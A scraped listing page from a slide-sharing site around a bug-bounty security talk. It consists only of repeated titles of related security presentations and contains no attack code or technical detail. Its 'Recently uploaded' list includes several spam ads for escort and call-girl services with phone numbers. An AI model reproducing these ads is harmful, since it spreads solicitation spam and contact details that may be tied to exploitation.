The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfChristopher Doman
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?Ksenia Peguero
 

Similar to Watch How The Giants Fall: Learning from Bug Bounty Results (20)

ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdfITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Fall
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Appsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation SlidesAppsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation Slides
 
Protecting your organization against attacks via the build system
Protecting your organization against attacks via the build systemProtecting your organization against attacks via the build system
Protecting your organization against attacks via the build system
 
Security for cloud native workloads
Security for cloud native workloadsSecurity for cloud native workloads
Security for cloud native workloads
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
How to secure your web applications with NGINX
How to secure your web applications with NGINXHow to secure your web applications with NGINX
How to secure your web applications with NGINX
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
 
DevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsDevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platforms
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in Kubernetes
 
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
 

More from jtmelton

AllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorAllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorjtmelton
 
Building an AppSec Program From the Ground Up: An Honest Retrospective
Building an AppSec Program From the Ground Up:  An Honest RetrospectiveBuilding an AppSec Program From the Ground Up:  An Honest Retrospective
Building an AppSec Program From the Ground Up: An Honest Retrospectivejtmelton
 
Towards Securing Micro-Services
Towards Securing Micro-ServicesTowards Securing Micro-Services
Towards Securing Micro-Servicesjtmelton
 
AppSensor CodeMash 2017
AppSensor CodeMash 2017AppSensor CodeMash 2017
AppSensor CodeMash 2017jtmelton
 
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016jtmelton
 
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016jtmelton
 
AppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and ResponseAppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and Responsejtmelton
 

More from jtmelton (7)

AllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorAllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensor
 
Building an AppSec Program From the Ground Up: An Honest Retrospective
Building an AppSec Program From the Ground Up:  An Honest RetrospectiveBuilding an AppSec Program From the Ground Up:  An Honest Retrospective
Building an AppSec Program From the Ground Up: An Honest Retrospective
 
Towards Securing Micro-Services
Towards Securing Micro-ServicesTowards Securing Micro-Services
Towards Securing Micro-Services
 
AppSensor CodeMash 2017
AppSensor CodeMash 2017AppSensor CodeMash 2017
AppSensor CodeMash 2017
 
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
 
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
 
AppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and ResponseAppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and Response
 

Recently uploaded

notes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptnotes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptMsecMca
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756dollysharma2066
 
Unit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfUnit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfRagavanV2
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTbhaskargani46
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptDineshKumar4165
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01KreezheaRecto
 
Intro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfIntro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfrs7054576148
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoordharasingh5698
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptThermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptDineshKumar4165
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringmulugeta48
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfKamal Acharya
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Standamitlee9823
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 

Recently uploaded (20)

notes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptnotes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.ppt
 
NFPA 5000 2024 standard .
NFPA 5000 2024 standard                                  .NFPA 5000 2024 standard                                  .
NFPA 5000 2024 standard .
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Unit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfUnit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdf
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Intro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfIntro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdf
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptThermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.ppt
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced LoadsFEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 

Watch How The Giants Fall: Learning from Bug Bounty Results